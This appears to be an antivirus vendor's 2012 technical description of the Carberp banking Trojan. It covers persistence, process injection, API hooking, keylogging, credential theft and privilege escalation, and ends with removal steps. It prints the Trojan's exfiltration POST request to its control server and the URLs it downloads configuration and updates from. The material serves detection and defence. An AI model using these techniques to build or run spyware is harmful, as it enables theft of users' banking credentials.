Trojan.Win32.Carberp(Trojan.Win32.Generic!BT)

by alexander.adamov on October 3rd, 2012 in Malware Descriptions.

Platform: Win32
Type: Trojan
Size: 127035  bytes
Language: C++
MD5: 33e10314899a5b890a25f8cd85d67e67
SHA1: ff0a5ddd0c3769dcf918ec43e83d62d6bcd48bd1
Aliases: Diple, Carberp

Summary

Trojan.Win32.Carberp is a spyware designed to steal confidential user’s data.

Technical Details

Installation

Once activated, the Trojan resets interceptors in System Service Descriptor Table (SSDT). It then copies itself to the current user’s Windows auto-load folder:

%Documents and Settings%\%Current User%\Start Menu\Programs\Startup\<rnd>.exe

where <rnd> is a random alphanumeric sequence, for example "9sz7mt1lkeb" or "ww25znji2".

Thus, the Trojan copy is automatically launched each time Windows is booted on the victim machine.

Date and time file is created are the same as for:

%System%\smss.exe

To hide its executable file, the Trojan intercepts the following function:

NtQueryDirectoryFile

Payload

The Trojan launches a copy of the system file:

%WinDir%\explorer.exe

and injects a malicious code into its address space. In case of failure, it searches for the window with the class name "Shell_TrayWnd" (the window class corresponds to the "explorer.exe" process) or gets a list of all processes and compares process name hashes to the "explorer.exe" process hash written in the Trojan’s body.

Injected code launches several samples of the "svchost.exe" process and injects a malicious code, which implements the functionality described below, into the process address space. The original Trojan file is removed.

The Trojan keeps a file handle open to the executable:

%Documents and Settings%\%Current User%\Start Menu\Programs\Startup\<rnd>.exe

form the "svchost.exe" process to which a malicious code has been injected. Thus, the Trojan prevents deleting its executable file.

The Trojan counteracts the following antivirus software:

Avast
ESET NOD32 Antivirus
ESET Smart Security

The malware collects the following system information:

  • User name, computer name;
  • CPU information;
  • Hardware profile;
  • OS version, updates package installed;
  • Volume serial number;
  • General system information.

The Trojan encrypts the collected data and creates the following strings:

1|fullhaus|<encrypted_data>|0|0|0
2|fullhaus||<encrypted_data>|1|<list_of_launched_processes> 

<#>|fullhaus||<encrypted_system_data>|<additional_data_collected_by_Trojan>

where # is an operation number.

The Trojan then encrypts those strings and sends them to the attacker’s server:

inspectssl.com

The Trojan connects the attacker’s server and sends the following HTTP requests:

POST /e/<rnd2> HTTP/1.0
Host: inspectssl.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept: text/html
Connection: Close
Content-Type: application/x-www-form-urlencodedContent-Length: 84

a=<encrypted_data>

where rnd2 is a random alphanumeric sequence.

The Trojan can download an additional configuration file from:

http://inspectssl.com/upfls/8_1_1316531622

The file is 5331 bytes in size. It contains encrypted configuration data. The file is saved as:

%AppData%\<rnd>.dat

Based on the data read from the configuration file being downloaded, the Trojan can perform the following actions on the infected machine:

  • Update its original file by downloading and decrypting a file from the following resource:

http://mega.nn.ru/upload/banners/zsguupuebx

The encrypted file is 139291 bytes in size. Once the file is decrypted, the Trojan saves it to the auto-load directory replacing its previous executable file. The executable file is saved to the temporary folder with a random name:

%Temp%\<tmp>.tmp

where tmp is a temporary name. Updated version of the Trojan is 139264 bytes in size.

  • Intercept a network traffic by setting system interceptors to the following functions:

InternetCloseHandle
InternetQueryDataAvailable
InternetReadFile
InternetReadFileExA
InternetReadFileExW
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW

  • Log keyboard input;
  • Interferes with the OS performance by deleting critically important system files:

%System%\hal.dll
C:\ntldr

  • Steal user’s confidential information when working with internet-banking;
  • Steal data the user types in the window with the “TLoginWindow" class name. Format of the file with the stolen data is as follows:

login: <login>
password: <password>
path: <full_path_to_executable_file_of_application>

  • Take a screenshot of the current display of the computer screen using its inner library named "screens_dll.dll". The screenshot is saved as a compressed JPEG to the current user's Windows temporary folder as:

%Temp%\<tmp>.tmp

And then as:

%Temp%\screen.jpeg

  • Can get system privileges using a vulnerability in the Windows core (MS11-011). The vulnerability is exploited on Windows Vista SP2 and Windows 7.

The stolen information is stored in the file:

%Temp%\<tmp>.tmp

And then:

%Temp%\Information.txt

A report file is of the following format:

Program: <program_name>
Wnd Name: <active_window_name>
Server: <address>:<port>
Password: <password>
Certificate: <certificate>
ClipBuffer: <history_of_characters_entered_by_user>

Using functions of the "cabinet.dll" library, the Trojan creates a cab-archive with the following name:

%Temp%\CAB<tmp>.tmp

where it stores files with stolen data. The malware then encrypts the file and sends it to the attacker’s server. Once data is sent, the file is deleted. 

Removal Recommendations

  1. Restart the computer in safe mode (press and hold the F8 key as the computer restarts, and then select “Safe Mode” on the boot menu).
  2. Delete a file:
  3. %Documents and Settings%\%Current User%\Start Menu\Programs\Startup\<rnd>.exe

  4. Clean a folder:
  5. %Temp%

  6. Clean the Temporary Internet Files folder, which contains infected files (How to clean Temporary Internet Files folder).
  7. Install the latest Windows updates:
  8. http://technet.microsoft.com/ru-ru/security/bulletin/ms11-011

  9. Run a full scan of your computer using the Antivirus program with the updated definition database (Download Ad-Aware Free).